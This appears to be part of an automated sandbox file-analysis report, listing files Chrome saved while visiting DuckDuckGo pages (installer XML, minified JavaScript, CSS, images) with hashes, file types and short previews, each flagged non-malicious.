                                                                                                                                                            SHA-256:CE38D0D12777AFEBB7BE00861696A9E40E949CDCE98A64E307C085B6040B7378
                                                                                                                                                            SHA-512:D17B96FAE4C54F482F7DC164AF42CD0636F9682D494B20CB38806EA050B809DA0F1EBDD07DD72753B28F010F70987377991BCA506672AB0E3752CF3D1C16BC24
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:L..................F.@.. ...$+.,......s]/...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IHY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VHY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VHY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VHY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VHY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):768
                                                                                                                                                            Entropy (8bit):5.600886389690732
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9slNQXc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsnZ:JdVOO+G+c44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:D0351CBCCE42015CD1627F7E8CD10B9C
                                                                                                                                                            SHA1:E43B9B51B2417BA2CFC44D9D1915037C5226A3E7
                                                                                                                                                            SHA-256:EB8F25250DC1D190B9FB345904358A624B9F213F1CA1FB1476CC6D520332B357
                                                                                                                                                            SHA-512:9D357E9CF0A2C9F43B620AD19BD78556344D6D198BE4FB7839A43FD18C9078349ED30D3CE4DF7B2D23412B4C9C6ED847F725F926512A6C4AEB8D0B7AB1A4940F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___details/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):768
                                                                                                                                                            Entropy (8bit):5.600886389690732
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9slNQXc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsnZ:JdVOO+G+c44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:D0351CBCCE42015CD1627F7E8CD10B9C
                                                                                                                                                            SHA1:E43B9B51B2417BA2CFC44D9D1915037C5226A3E7
                                                                                                                                                            SHA-256:EB8F25250DC1D190B9FB345904358A624B9F213F1CA1FB1476CC6D520332B357
                                                                                                                                                            SHA-512:9D357E9CF0A2C9F43B620AD19BD78556344D6D198BE4FB7839A43FD18C9078349ED30D3CE4DF7B2D23412B4C9C6ED847F725F926512A6C4AEB8D0B7AB1A4940F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___details/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):765
                                                                                                                                                            Entropy (8bit):5.604814118594547
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9s2Xc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsn/cG:JdVOO+Gwc44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:56C713306E2ECE8B12A9F3163E09AFE6
                                                                                                                                                            SHA1:49F5852F7EAE7619BB2842D260739B9E3CD61DC5
                                                                                                                                                            SHA-256:BD5403F994DBB6DA9F44C0B0010CC7A70D425872C9155D069C28C0ABCDD34792
                                                                                                                                                            SHA-512:8DBC0A11D0089603539A1C52314EC7AA62762554A1A1EFD27CB09ADC4D4625CAA08CF7F4DDA3A5975CF85C41BC47AE47BA5707BC8A9B20A008B6D3156AD6C305
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___hero/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):765
                                                                                                                                                            Entropy (8bit):5.604814118594547
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9s2Xc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsn/cG:JdVOO+Gwc44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:56C713306E2ECE8B12A9F3163E09AFE6
                                                                                                                                                            SHA1:49F5852F7EAE7619BB2842D260739B9E3CD61DC5
                                                                                                                                                            SHA-256:BD5403F994DBB6DA9F44C0B0010CC7A70D425872C9155D069C28C0ABCDD34792
                                                                                                                                                            SHA-512:8DBC0A11D0089603539A1C52314EC7AA62762554A1A1EFD27CB09ADC4D4625CAA08CF7F4DDA3A5975CF85C41BC47AE47BA5707BC8A9B20A008B6D3156AD6C305
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.<?xml version="1.0" encoding="utf-8"?>..<AppInstaller...Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___hero/DuckDuckGo.appinstaller"...Version="0.90.3.0" xmlns="http://schemas.microsoft.com/appx/appinstaller/2017/2">...<MainBundle....Name="DuckDuckGo.DesktopBrowser"....Version="0.90.3.0"....Publisher="CN=&quot;Duck Duck Go, Inc.&quot;, OU=Engineering, O=&quot;Duck Duck Go, Inc.&quot;, L=Paoli, S=Pennsylvania, C=US, SERIALNUMBER=5019303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US"....Uri="https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle" />..</AppInstaller> ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):48316
                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x120, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):7795
                                                                                                                                                            Entropy (8bit):7.923950986869663
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:cmrUa0F3sspOxIGWtLNHj9VUcdDjA1+CyDBQBI1DUUcGz:5UDdmE9VUEXA1XCGQDUUcGz
                                                                                                                                                            MD5:3F565A862EE152A266EDF3FF2A12E56D
                                                                                                                                                            SHA1:7BFEC29023D0D64CDE7091C1B0BD3E9B5F23F7DC
                                                                                                                                                            SHA-256:27DF6F3A0DF547D8E3A9DAA3DA1763CFEBB0E5D3822C3880C07B3FEA17BE52B7
                                                                                                                                                            SHA-512:3A8F47BE8E1EC01F519F81F027931F5306EC58EF6F3671FD64D49440750A691151622316CEB32E83D4FA07BD564D5F26A9A2D11378100C27F541197B9F779334
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/EfLqyLoo5-iga5l8oerPNmDlmJnUbZACbTAw0gOJhirRHXhLVgOaEa8BhqNNIzTjwUoSRObkvpBc3tICfQ0DV3EO=s192-w192-h120
                                                                                                                                                            Preview:......JFIF......................................................................................................................................................x..............................................F...........................!."1..2AQ.#Saqs......$3RT......4Br.....C..................................:........................!1AQ..aq......RSr....."#23T..Bb.............?...[GV...-....Z41..SCQ.}-.@........ s.M.Fy... s.M.@....9..9#".....LzA.......Jc.3..........ljA.....a=-.H8..c.C...n.('......gh.Ttwf].i.v.....W-...F.%...qAj....q$#.Xs..X.R..&....k{oo.?.W.<.$.8.^[.<.-~..G0t.2.a4..PD]T.R.wb ..^RO.$..m'k.......>O..%..o-.W...ey9x.r...(...w}..9.v..G..we.u...[:Y.....x.w...]%....".6.+...;...."C....t...36U.6.k....Y8..?<.;;.....Kq...."i.D...|...]..}......Q.CJX..9.V.Z..m.....U...)l......s....t.j.0.|.iw..:.-.RY....&.&S.F...E.....g~..........:.. ..Lz2&..DL..Lz2&.49 .zS..g.Jd............"z[...OKc.K.f}.].m...L.DP.......;"^.A.E..+.....Xl.....-..J.R.:..O=]...m.../wK.}C
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 782 x 1504, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):98937
                                                                                                                                                            Entropy (8bit):7.9766783313567
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:2tK/Oeee9eJ+8qC6a4phXJzIfEhbdisO9w1f5KQz1:Agz0JKCUZ8EhHO9w1hKw1
                                                                                                                                                            MD5:E6E56DEFE0B2BC5B17F1172DDEA8C14F
                                                                                                                                                            SHA1:2B8F0CD66572B98E1FA19FE82084562ABF6D7C6F
                                                                                                                                                            SHA-256:157676A3E48297ADAE13F8B3A29CBBEF4537148A76871146B86D4AB8C9DB28B3
                                                                                                                                                            SHA-512:A8EA99C8F2CC7EC99A1B7C75A6D02F7ECAC88479FEE45F09E9802E3EC5D38765311CD5DE55A5CE9997784F8BA066E1E2A2A6B658BF852B69005FB2576D0BEEA4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png
                                                                                                                                                            Preview:.PNG........IHDR....................PLTE...................................................PPP........................................"""...............+++...fff...:::.4@222%&.......JJJ...................yyy...............h..............x.........BBBnnn...........sss]]]RRR...XXX..................$&.Z........P..>....F....L..q........S........?..x..C..X.....//................@..4.S....D5....x...........T_.?K......:9.....HS...HH.............G..VV.|......"...vv.........................$}.........a`...t..'...P.......g...8....^j...ll..TBc..(.....~.;..w......C.c..G..C.........r1...akH..w......X.....Y.........Z...px.f]t.].u.zo.C....j.A..9..d..3.N....tRNS..... ....aL..+.#.A1.xq....3....IDATx...............................3P........t[..w..... f...!f...D"qWh.7..?..T.?...6t..}N..7....?.[.;.O..w9..9M.cb....i....b.zn"...uJ.W2..{C....... ..'!..G$B....a...F.g...&m...VE:6$......-%.N.w..... ..{.p1C...^..)WBK..~.]$.;.$..<......`C...._..7.b.r..Fg...Z.=..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (10992), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):10992
                                                                                                                                                            Entropy (8bit):5.175045287426147
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:oZR1lcPbxCpvdeKb3z5p5/gpdW8Ovl5HCB3NzAEwBitJZC1N:w0FC6o3t7b8Ot5HCBR96UON
                                                                                                                                                            MD5:4EEE8498FD1474D6BD65C517C326EB7A
                                                                                                                                                            SHA1:59132BBABB115FFCE50E42AE046103BD0B632D56
                                                                                                                                                            SHA-256:CCCEDF809052A4EE24F898E5971D2EB2C5D8353FC33D57A3713AE909A617128B
                                                                                                                                                            SHA-512:6ED007658088F6845349BC83737243A7DF21E081C9FBBC2E10074B0EAEBD5D527983CCD634A6A132E6153A081D07DD9FB2BCC1FE3157FE5463E7072592B43BC5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[43965],{14921:function(t,n,e){e.d(n,{h:function(){return a}});var r=e(67294),o=e(96637),i=e(12459),s=e(73935),a=function(t){var n=t.children,e=t.type,a=void 0===e?"reach-portal":e,u=t.containerRef,c=(0,r.useRef)(null),l=(0,r.useRef)(null),p=(0,i.N)();return(0,o.L)((function(){if(c.current){var t=c.current.ownerDocument,n=(null==u?void 0:u.current)||t.body;return l.current=null==t?void 0:t.createElement(a),n.appendChild(l.current),p(),function(){l.current&&n&&n.removeChild(l.current)}}}),[a,p,u]),l.current?(0,s.createPortal)(n,l.current):(0,r.createElement)("span",{ref:c})};n.Z=a},12769:function(t,n,e){function r(){return!("undefined"===typeof window||!window.document||!window.document.createElement)}e.d(n,{N:function(){return r}})},24683:function(t,n,e){function r(t,n){return function(e){if(t&&t(e),!e.defaultPrevented)return n(e)}}e.d(n,{M:function(){return r}})},61331:function(t,n,e){e.d(n,{e:function(){return u}});
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 756 x 1450, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):64366
                                                                                                                                                            Entropy (8bit):7.974945120371936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:uXaNSqgLN43VPoWm0VFefzPRo0FZvwp1j3kZQyuNsAYFFp:uE8i3dRV4rPXFZvYdUg0bp
                                                                                                                                                            MD5:C077F143524F375831D4CBAC25F35700
                                                                                                                                                            SHA1:8801E1092762D7AB91971A01079C5805DB3F2AD1
                                                                                                                                                            SHA-256:F74D30563CFFF0DF0766BE1414B7447ACBC0FC75C0B2193481D1BEB9B4CF98DA
                                                                                                                                                            SHA-512:289F2FF0B5540242F4B9876CB4C555313DE862DF2707EA5F02C58625E88C48EF60333CF7D98B3B1A57AFF8FB727A8DFBD85294523D97480F3E4478E5DCD18594
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............!.-....PLTE...%%%........................................................................................mL............................&&&................t2.r1}`..X2..........q/.n..................p/.p....@?@223..........l-.....w3................................-.|||.y6...WWX:::............^^^......FFG........QPR...xxx....i,...pppKKL..........x............cbd..........wX..............j...oO.......)..... ....hhh...$............u..k..qQ.,.^......E'...........sss....^4.:+.<%.Pz.&.d2....O(........K.:.6..3(........{\.G5..3.lE.u?P.........Z.k...mmm.i.]*.].mM.V3sS..G%...pf%..|.wL.a...wt........:!...gG=........b?....~C.z].....~{..WH.WE.G;..s...hfq.zF.....R...sp}..olx.o].m3....xY.6.3R2(..Th.....4....CY.....S...k.P..@..x.....tRNS.......".. ..(.P.^.n..y............IDATx..............................]3Pr..........9..i.....$(.\R...............5...g.<......\{..H.T,. ....oNN(G..i......^.F/.S....../P......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (2051)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14684
                                                                                                                                                            Entropy (8bit):5.466852947616851
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:IYikmqAScZ+Ad7y0B6nfCHa3rFC+5aiWQLHO91RIuW:IqmqAeA1B2KgrrW2f
                                                                                                                                                            MD5:95028A4E3FD66AF73F1C6733C387208A
                                                                                                                                                            SHA1:99E4FDABDDBA5CA768CB171E3726B4008A89AE6A
                                                                                                                                                            SHA-256:3D49439AEE51F4DCB87B5C6B7910AA3145B0584F59FF6ABEFCC398C2ABFFC30C
                                                                                                                                                            SHA-512:04F97D3D4CDC8C89018006F5C4470952DAB958CEC311A6C545BA1C304B339624AE09ED1D97401446B8619A6DC90B1180972280127B5793C316A287F2F39AE1DF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):82385
                                                                                                                                                            Entropy (8bit):5.208180750396057
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:YkyxiGyw9EbbCxoWp5uQAaM+jGS8oSfUVAac2QmSdz58gUMO:Dq+tQAaBjG36VAac98gG
                                                                                                                                                            MD5:BA03F713C22AFA92B6A844B1F16BC008
                                                                                                                                                            SHA1:B0491936F8A924F6CCD31024799D8E16C82A95E1
                                                                                                                                                            SHA-256:99CBF6DB4280B2D0301807BFDB93BA7F20EC10636A8BA899A2D8FF09C89AB60B
                                                                                                                                                            SHA-512:12AAE12D5278C60744D18CDD4908AFE0223DA5ED3E85E2474D89AB0C3628D89D072AA2E02FA20C32446F2617E75B81A5A99809D2FE2A819F167DEBB186404A8A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.center_root__Uf1xM{box-sizing:content-box;max-width:100%;margin-left:auto;margin-right:auto;padding-left:var(--center-gutter);padding-right:var(--center-gutter)}@supports(max-inline-size:var(--center-measure )){.center_root__Uf1xM{max-width:var(--center-measure);max-inline-size:var(--center-measure)}}@supports(margin-inline:auto){.center_root__Uf1xM{margin-left:0;margin-right:0;margin-inline:auto}}@supports(padding-inline-start:var(--center-gutter )) and (padding-inline-end:var(--center-gutter )){.center_root__Uf1xM{padding-left:0;padding-right:0;padding-inline-start:var(--center-gutter);padding-inline-end:var(--center-gutter)}}.center_andText__ejUnC{text-align:center}.center_intrinsic__mk_Ab{display:flex;flex-direction:column;align-items:center}.center_gutters__Ot5Wk{--center-gutter:var(--sp-4)}.card_card__afbUo{padding:var(--sp-4)}.card_card__afbUo.card_dismissable__j5ZTy{position:relative}.card_card__afbUo.card_elevation0__xXwlZ{box-shadow:var(--elevation-0)}.card_card__afbUo.card_
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1280x800, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):367292
                                                                                                                                                            Entropy (8bit):7.749450188535562
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:v7fSy4z54VXR51ovULax1p4lWgDD1XiL/RoJq0ATiBuz+bPlf5x0PVQr9sMfV68p:zf0yVB5S2ax1p4EAXiL/L1+Q80PVQr9f
                                                                                                                                                            MD5:803AB89E51D67688DD00B91C6D15B272
                                                                                                                                                            SHA1:7080A848CC663A632B550F8CE0604EAB48D5E198
                                                                                                                                                            SHA-256:43F27CE2A28F3BD02FAA9ACD21C3A4888106E1EA1FB6FF4EDE61E2CAFBD6C129
                                                                                                                                                            SHA-512:88846A0C6E38154A17DF4712B43D11AB0A4494598CE40E8AAB963BE27034EAA127081A78FF15C70D37EF454F423A1514A169B5B0BF6BC4BB2A83BA62492D130E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/LtBvUp3Og39KJjwrHuvaqaooDAjOS1drA8yvKNS4X8507y1sm5dYLRtDvr8ddiRjaXUMPIPwrVtWgBWrYUO5y8QM7A=s1280-w1280-h800
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C....................................................................... .................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........>..[...?..m.y.Xv#...}.Z..?..o ./....i._.K.....P.....8...n8..n.G..........._........".........P......#.c..3.......R.]6.._....w...O..?..K.i.....j7..o.y....?.................j.I[o..P......E-..?.....CW-...c....lR..9<.....Z.^_....>...J.]...._....&.R.t&...?..+}..]............y.{zt...j."..........P.4_........e/?...q......q.&]...P...?......nZ~v...y..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x297, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6185
                                                                                                                                                            Entropy (8bit):7.582777569461185
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:PEC8Eorxe+OE0Y5iMLzHehxFoHo/9xKjYQfSIhB1+3KifO+NzL8kzU:PEEWxerxMfGIu9IkQfSIhBcFO+N/8kQ
                                                                                                                                                            MD5:E76C3A2535DEE5272F965A87DE405761
                                                                                                                                                            SHA1:2FC767D9F0A652F3452C0F1945A7B9052026357E
                                                                                                                                                            SHA-256:4EF2F92020B034E12F3C3A3D7A441FE0C9AA72EB27FBDCEDDA18114873E70CFA
                                                                                                                                                            SHA-512:83E98555272A1838E30C9DD9FD42AC51F008B6E6CDF1BCBC930FA12A89697C6BD9E8C869A706EF5F292463901F77BE316D0292135AEF7B0B5C2295605C7CDE67
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................).d...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(....+..#.Q.Q.G...af&.E...7...~!f.........|.7.z......J..9Cp...9D..K..._0.....+....|...... ...bS.....p...)].Q..L.QE....#.~ts[.Y...P.~....t.1..K.e.....z....a.....bl&.F...w.+y.(.....7.Z4.!2}M.C..s.f.o!.2=E+..a...C..;1.......X.....Z......>R.o.`&..E....K.....q.u.>Q7.Z/.;!....Z.....>_!7.Z...Af&..J....X...e$...i=...}]....J.7.~..H._1.Lv...P.#.O.;....)E...5.w.r....>..c.bn4.>Q
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:1
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 756 x 1450, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):182030
                                                                                                                                                            Entropy (8bit):7.9691179124884455
                                                                                                                                                            Encrypted:false
